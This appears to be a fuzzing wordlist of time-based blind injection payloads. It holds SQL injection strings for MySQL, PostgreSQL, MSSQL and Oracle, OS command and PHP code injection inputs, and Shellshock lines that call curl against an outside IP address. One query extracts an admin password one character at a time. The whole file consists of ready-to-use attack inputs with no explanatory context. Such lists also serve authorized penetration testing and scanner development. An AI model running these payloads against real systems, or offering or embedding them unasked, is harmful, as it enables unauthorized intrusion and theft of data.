" or benchmark(10000000,MD5(1))#
" or pg_sleep(20)--
" or sleep(20)#
" or sleep(20)="
") or benchmark(10000000,MD5(1))#
") or pg_sleep(20)--
") or sleep(20)="
")) or benchmark(10000000,MD5(1))#
")) or pg_sleep(20)--
")) or sleep(20)="
"));waitfor delay '0:0:20'--
"))||pg_sleep(20)--
");waitfor delay '0:0:20'--
")||pg_sleep(20)--
";waitfor delay '0:0:20'--
"||pg_sleep(20)--
%20$(sleep%2050)
%20'sleep%2050'
%20{${sleep(20)}}
%2b(select*from(select(sleep(20)))a)%2b'
%2c(select%20*%20from%20(select(sleep(20)))a)
& sleep 5
& system('sleep 5');
&& sleep 5
&& system('sleep 5');
&&SLEEP(5)
&&SLEEP(5)#
&&SLEEP(5)--
' AnD SLEEP(5) ANd '1
' or benchmark(10000000,MD5(1))#
' or pg_sleep(20)--
' or sleep(20)#
' or sleep(20)='
'%20and%20(select%20%20from%20(select(if(substring(user(),1,1)='p',sleep(20),1)))a)--%20 - true
'%2b(select*from(select(sleep(2)))a)%2b'
'%2b(select*from(select(sleep(20)))a)%2b'
'%2bbenchmark(10000000%2csha1(1))%2b'
'&&SLEEP(5)&&'1
') or benchmark(10000000,MD5(1))#
') or pg_sleep(20)--
') or sleep(20)='
')) or benchmark(10000000,MD5(1))#
')) or pg_sleep(20)--
')) or sleep(20)='
'));waitfor delay '0:0:20'--
'))||pg_sleep(20)--
');(SELECT 4564 FROM PG_SLEEP(5))--
');waitfor delay '0:0:20'--
')||pg_sleep(20)--
'+(select*from(select(if(1=1,sleep(20),false)))a)+'"
'; waitfor delay '0:0:20'--
';WAITFOR DELAY '0:0:5'--
';sleep(20000);
';sleep(20000);'
';sleep(20000);+'
';waitfor delay '0:0:20'--
'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(5) ELSE 0 END)XOR'Z
'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(9) ELSE 0 END)XOR'Z
'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z
'XOR(if((select now()=sysdate()),sleep(20),0))XOR'Z
'XOR(if(now()=sysdate(),sleep(20),0))XOR'
'XOR(if(now()=sysdate(),sleep(5*1),0))OR'
'XOR(if(now()=sysdate(),sleep(5*1*0),0))OR'
'||pg_sleep(20)--
() { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6"
() { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7"
() { :;}; /bin/bash -c "sleep 5 && echo vulnerable 5"
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8"
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9"
(SELECT * FROM (SELECT(SLEEP(5)))a)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
(SELECT 1 FROM (SELECT SLEEP(5))A)
(SELECT(0)FROM(SELECT(SLEEP(5)))a)
(SELECT(0)FROM(SELECT(SLEEP(6)))a)
(select*from(select(sleep(20)))a)
));waitfor delay '0:0:20'--
);waitfor delay '0:0:20'--
*'XOR(if(2=2,sleep(20),0))OR'
+ SLEEP(5) + '
+benchmark(3200,SHA1(1))+'
,(select * from (select(sleep(20)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(5))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(5))A))(SELECT * FROM (SELECT(SLEEP(5)))YYYY)(SELECT * FROM (SELECT(SLEEP(5)))YYYY)#(SELECT * FROM (SELECT(SLEEP(5)))YYYY)--'+(select*from(select(sleep(20)))a)+'(select(0)from(select(sleep(20)))v)%2f'+(select(0)from(select(sleep(20)))v)+'"(select(0)from(select(sleep(20)))v)%2f*'+(select(0)from(select(sleep(20)))v)+'"+(select(0)from(select(sleep(20)))v)+"*%2f(select(0)from(select(sleep(20)))v)/*'+(select(0)from(select(sleep(20)))v)+'"+(select(0)from(select(sleep(20)))v)+"*/(select(0)from(select(sleep(20)))v)/*'+(select(0)from(select(sleep(20)))v)+'\"+(select(0)from(select(sleep(20)))v)+\"*/',''),/*test*/%26%26%09sLeEp(5)%09--+
/**/xor/**/sleep(20)
//xor//sleep(20)
0"XOR(if(now()=sysdate(),sleep(20),0))XOR"Z
0%27XOR(if(now()=sysdate(),sleep(4),0))XOR%27Z&category=0%27XOR(if(now()=sysdate(),sleep(20),0))XOR%27Z&city=0%27XOR(if(now()=sysdate(),sleep(20),0))XOR%27Z&country=0%27XOR(if(now()=sysdate(),sleep(20),0))XOR%27Z&email=0%27XOR(if(now()=sysdate(),sleep(20),0))XOR%27Z&id=0%27XOR(if(now()=sysdate(),sleep(20),0))XOR%27Z&language=0%27XOR(if(now()=sysdate(),sleep(20),0))XOR%27Z&page=0%27XOR(if(now()=sysdate(),sleep(20),0))XOR%27Z&password=0%27XOR(if(now()=sysdate(),sleep(20),0))XOR%27Z&product_id=0%27XOR(if(now()=sysdate(),sleep(20),0))XOR%27Z&search=0%27XOR(if(now()=sysdate(),sleep(20),0))XOR%27Z&state=0%27XOR(if(now()=sysdate(),sleep(20),0))XOR%27Z&user=0%27XOR(if(now()=sysdate(),sleep(20),0))XOR%27Z&username=0%27XOR(if(now()=sysdate(),sleep(20),0))XOR%27Z&zip=0%27XOR(if(now()=sysdate(),sleep(20),0))XOR%27Z
0'XOR(if(now()=sysdate(),sleep(20),0))XOR'X
0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z => 0.912
0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z => 1.229
0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z => 16.553
0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z => 20.002
0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z => 3.463
0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z => 7.282
0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z => 7.79
0'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z
0'or(now()=sysdate()&&SLEEP(1))or'Zif(now()=sysdate(),sleep(20),0)/"XOR(if(now()=sysdate(),sleep(20),0))OR"/if(now()=sysdate(),sleep(20),0)/*'XOR(if(now()=sysdate(),sleep(20),0))OR'"XOR(if(now()=sysdate(),sleep(20),0))OR"*/if(now()=sysdate(),sleep(20),0)/'XOR(if(now()=sysdate(),sleep(20),0))OR'"XOR(if(now()=sysdate(),sleep(20),0) and 5=5)"/if(1=1,sleep(20),0)/*'XOR(if(1=1,sleep(20),0))OR'"XOR(if(1=1,sleep(20),0))OR"*/if(1337=1337,exp(~(1)),0)/*'XOR(if(1337=1337,exp(~(1)),0))OR'"XOR(if(1337=1337,sleep(20),0))OR"*/SLEEP(5)/*' or SLEEP(5) or '" or SLEEP(5) or "*/%2c(select%5*%5from%5(select(sleep(20)))a)
0'|(IF((now())LIKE(sysdate()),SLEEP(5),0))|'Z
1 AND (SELECT(0)FROM(SELECT(SLEEP(5)))a)-- wXyW
1 or benchmark(10000000,MD5(1))#
1 or pg_sleep(20)--
1 or sleep(20)#
1' AND (SELECT 6268 FROM (SELECT(SLEEP(5)))ghXo) AND 'IKlK'='IKlK
1' AND SLEEP(5) AND '1'='1
1'%2b(select*from(select(sleep(20)))a)%2b'
1'=sleep(20)='1
1) or benchmark(10000000,MD5(1))#
1) or pg_sleep(20)--
1) or sleep(20)#
1)) or benchmark(10000000,MD5(1))#
1)) or pg_sleep(20)--
1)) or sleep(20)#
1))||pg_sleep(20)--
1)||pg_sleep(20)--
1,'0');waitfor delay '0:0:5;--
1; waitfor delay '0:0:20'--
1||pg_sleep(20)--
2021 AND (SELECT 6868 FROM (SELECT(SLEEP(5)))IiOE)
; sleep 5
; system('sleep 5');
;waitfor delay '0:0:20'--
<?php system("sleep 5");?>
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND SLEEP(5) AND ('kleiton'='kleiton
AND if not(substring((select @version),25,1) < 52) waitfor delay  '0:0:5'--
AND if not(substring((select @version),5,1) < 52) waitfor delay  '0:0:5'--
AnD SLEEP(5)
AnD SLEEP(5)#
AnD SLEEP(5)--
BENCHMARK(10000000,MD5(CHAR(116)))
CASE//WHEN(LENGTH(version())=10)THEN(SLEEP(5*1))END
DBMS_LOCK.SLEEP(5);
IF 1=1 THEN dbms_lock.sleep(20);
OR SLEEP(5)
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)#
ORDER BY SLEEP(5)--
SELECT CASE WHEN (1=1) THEN pg_sleep(20) ELSE pg_sleep(20) END--
SELECT CASE WHEN SUBSTR((SELECT password FROM users WHERE username='admin'),1,1)='a' THEN dbms_lock.sleep(20) ELSE dbms_lock.sleep(20) END FROM dual
SLEEP(5)
SLEEP(5)#
SLEEP(5)--
SLEEP(5)/*' or SLEEP(5) or '" or SLEEP(5) or "*/
SLEEP(5)="
SLEEP(5)='
WAITFOR DELAY '0:0:5' and 'a'='a;--
WAITFOR DELAY '0:0:5';--
X'XOR(if((select now()=sysdate()),BENCHMARK(1000000,md5('xyz')),0))XOR'X
X'XOR(if(now()=sysdate(),(sleep((((5))))),0))XOR'X
X'XOR(if(now()=sysdate(),/**/sleep(20)/**/,0))XOR'X
\necho INJECTX\nexit\n\033[2Asleep 5\n
and if(substring(user(),1,1)>=chr(97),SLEEP(5),1)--
benchmark(10000000,MD5(1))#
benchmark(200000000,MD5(1))
benchmark(200000000,MD5(1))#
benchmark(200000000,MD5(1))--
desc%2c(select*from(select(sleep(20)))a)
eval('sleep 5')
eval('sleep 5');
exec('sleep 5')
exec('sleep 5');
if(now()=sysdate(),sleep(20),0)
if(now()=sysdate(),sleep(20),0)/'XOR(if(now()=sysdate(),sleep(20),0))OR'"XOR(if(now()=sysdate(),sleep(20),0))OR"/
if(now()=sysdate(),sleep(20),0)/'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(20),0))OR"/
if(now()=sysdate(),sleep(20),0)/'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(20),0) and 1=1)"/
if(now()=sysdate(),sleep(4),0)/'XOR(if(now()=sysdate(),sleep(20),0))OR'"XOR(if(now()=sysdate(),sleep(20),0))OR"/
if(now()=sysdate(),sleep(4),0)/'XOR(if(now()=sysdate(),sleep(20),0))OR'"XOR(if(now()=sysdate(),sleep(20),0) and 1=1)"/
or (sleep(20)+1) limit 1 --
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
or benchmark(200000000,MD5(1))
or benchmark(200000000,MD5(1))#
or benchmark(200000000,MD5(1))--
or pg_SLEEP(5)
or pg_SLEEP(5)#
or pg_SLEEP(5)--
pg_SLEEP(5)
pg_SLEEP(5)#
pg_SLEEP(5)--
pg_sleep(20)
pg_sleep(20)--
sleep 5
sleep(20)#
system('sleep 5')
system('sleep 5');
waitfor delay '00:00:05'
waitfor delay '00:00:05'#
waitfor delay '00:00:05'--
{${sleep(20)}}
{${sleep(hexdec(dechex(5)))}}
| sleep 5
| system('sleep 5');
|| sleep 5
|| system('sleep 5');
||pg_sleep(20)--
‘ AND (SELECT 8839 FROM (SELECT(SLEEP(5)))uzIY) AND ‘mSUA’=’mSUA